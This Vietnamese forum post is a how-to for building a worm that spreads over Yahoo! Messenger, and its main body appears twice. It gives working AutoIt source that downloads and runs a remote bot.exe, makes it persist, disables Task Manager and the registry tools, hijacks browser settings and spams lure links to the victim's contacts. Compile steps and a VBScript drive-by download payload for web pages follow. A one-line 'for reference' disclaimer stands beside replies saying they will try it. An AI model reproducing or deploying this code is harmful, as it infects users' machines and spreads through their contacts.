Cách làm virus lan tràn qua Y!M
2 posters
Trang 1 trong tổng số 1 trang
Cách làm virus lan tràn qua Y!M
Trước tiên save đọan code này vào notepad dưới dạng *.txt (vd: bot.txt).Bạn sửa lại theo ý thích nha
If Not FileExists(@WindowsDir & “\taskmsg.exe”) Then
InetGet (”http://phidao.net/yahoo/bot.exe”, @WindowsDir & “\taskmsg.exe”, 0, 1)
Sleep(5000)
EndIf
RegWrite(”HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel”, “Homepage”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableRegistryTools”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Start Page”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run”, “Task Manager”, “REG_SZ”, @WindowsDir & “\taskmsg.exe”)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Window Title”, “REG_SZ”, “Minhnhut.be :: Another Version of Nhut.be :: Chut gi de nho…”)
$tin[0] = “Vui gi ma vui the! Dau ca bung roi ne… http://phidao.net/yahoo/ “
$tin[1] = “Trui, ngo nghinh qua a… Vo coi thu nao http://phidao.net/yahoo/ “
$tin[2] = “Vui kinh khung! Ghe qua day ti xiu nha ban http://phidao.net/yahoo/ “
$tin[3] = “Chao mung cac ban den voi Dao Khuc Community http://phidao.net/yahoo/ “
$tin[4] = “Moi phat hien ra cai nay ne, cuc hay luon nha http://phidao.net/yahoo/ “
$tin[5] = “Kinh di qua di mat… Toan la ma trong nay ne http://phidao.net/yahoo/ “
$tin[6] = “Gom gi ma gom the… Vao day ma xem gom co nao http://phidao.net/yahoo/ “
$tin[7] = “Cai gi the nhi? Thang ban moi quang cao cai nay http://phidao.net/yahoo/ “
$tin[8] = “Troi oi!Album hinh moi lam dep ghe==> http://phidao.net/yahoo/ “
$tin[9] = “Hey! Coi Album hinh moi lam ne http://phidao.net/yahoo/ “
While (1)
sleep(60000)
$tieude = WinGetTitle(”Yahoo! Messenger”, “”)
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send(”^m”)
Send(”{DOWN}”)
Send(”^{SHIFTDOWN}{END}{SHIFTUP}”)
Send(”{ENTER}”)
Send(”^v {ENTER}”)
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
Sau khi cài đặt xong mở chương trình “Compile script to.exe”
Ở fần Source (AutoIT .au3 file): chọn đường dẫn tới file bot.txt vừa tạo
Custom Icon (.ico): tạo icon cho chương trình, ko có cũng ko sao
Đánh vào dấu kiểm Allow decompilation
Passphrase: đánh password tùy thích vào
Verify Passphrase: đánh lại password
Nhấn nút convert là xong.
****
Tiếp theo đính đọan code này vào web để chạy file bot.exe
on error resume next
dl = “http:/phidao.net/yahoo/bot.exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
Okie xong rùi đó test thử xem nào
———————————————-
Các bạn sử dụng phần mềm Autoit 3.2.1 để tạo con này nhé
Bài viết với mục đích tham khảo mong các ban cẩn thận khi thức hành
If Not FileExists(@WindowsDir & “\taskmsg.exe”) Then
InetGet (”http://phidao.net/yahoo/bot.exe”, @WindowsDir & “\taskmsg.exe”, 0, 1)
Sleep(5000)
EndIf
RegWrite(”HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel”, “Homepage”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableRegistryTools”, “REG_DWORD”, “1″)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Start Page”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)
RegWrite(”HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run”, “Task Manager”, “REG_SZ”, @WindowsDir & “\taskmsg.exe”)
RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Window Title”, “REG_SZ”, “Minhnhut.be :: Another Version of Nhut.be :: Chut gi de nho…”)
$tin[0] = “Vui gi ma vui the! Dau ca bung roi ne… http://phidao.net/yahoo/ “
$tin[1] = “Trui, ngo nghinh qua a… Vo coi thu nao http://phidao.net/yahoo/ “
$tin[2] = “Vui kinh khung! Ghe qua day ti xiu nha ban http://phidao.net/yahoo/ “
$tin[3] = “Chao mung cac ban den voi Dao Khuc Community http://phidao.net/yahoo/ “
$tin[4] = “Moi phat hien ra cai nay ne, cuc hay luon nha http://phidao.net/yahoo/ “
$tin[5] = “Kinh di qua di mat… Toan la ma trong nay ne http://phidao.net/yahoo/ “
$tin[6] = “Gom gi ma gom the… Vao day ma xem gom co nao http://phidao.net/yahoo/ “
$tin[7] = “Cai gi the nhi? Thang ban moi quang cao cai nay http://phidao.net/yahoo/ “
$tin[8] = “Troi oi!Album hinh moi lam dep ghe==> http://phidao.net/yahoo/ “
$tin[9] = “Hey! Coi Album hinh moi lam ne http://phidao.net/yahoo/ “
While (1)
sleep(60000)
$tieude = WinGetTitle(”Yahoo! Messenger”, “”)
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send(”^m”)
Send(”{DOWN}”)
Send(”^{SHIFTDOWN}{END}{SHIFTUP}”)
Send(”{ENTER}”)
Send(”^v {ENTER}”)
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
Sau khi cài đặt xong mở chương trình “Compile script to.exe”
Ở fần Source (AutoIT .au3 file): chọn đường dẫn tới file bot.txt vừa tạo
Custom Icon (.ico): tạo icon cho chương trình, ko có cũng ko sao
Đánh vào dấu kiểm Allow decompilation
Passphrase: đánh password tùy thích vào
Verify Passphrase: đánh lại password
Nhấn nút convert là xong.
****
Tiếp theo đính đọan code này vào web để chạy file bot.exe
on error resume next
dl = “http:/phidao.net/yahoo/bot.exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”scripting.FileSystemObject”,””)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
Okie xong rùi đó test thử xem nào
———————————————-
Các bạn sử dụng phần mềm Autoit 3.2.1 để tạo con này nhé
Bài viết với mục đích tham khảo mong các ban cẩn thận khi thức hành
rat hay
Cha,
bai` viet hay qua.de em thu xem sao nhe
bai` viet hay qua.de em thu xem sao nhe
baby- Tập sự
- Tổng số bài gửi : 6
Diem : 5171
Thank : 0
Join date : 25/03/2010
Similar topics
» Lỗi do tràn bộ nhớ đệm và cách khắc phục
» Virus tin học và cách thức tấn công của chúng
» Cách sử dụng ardamax keylogger và cách diệt
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
» Virus tin học và cách thức tấn công của chúng
» Cách sử dụng ardamax keylogger và cách diệt
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root